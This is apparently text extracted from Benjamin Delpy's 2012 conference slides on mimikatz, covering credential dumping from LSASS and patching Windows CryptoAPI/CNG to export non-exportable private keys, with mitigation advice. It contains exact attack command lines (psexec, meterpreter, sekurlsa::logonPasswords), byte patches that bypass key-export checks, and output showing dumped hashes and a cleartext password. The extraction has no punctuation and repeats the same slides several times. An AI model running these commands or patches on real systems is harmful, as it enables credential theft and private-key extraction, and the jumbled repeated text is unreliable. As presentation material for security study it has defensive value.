Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
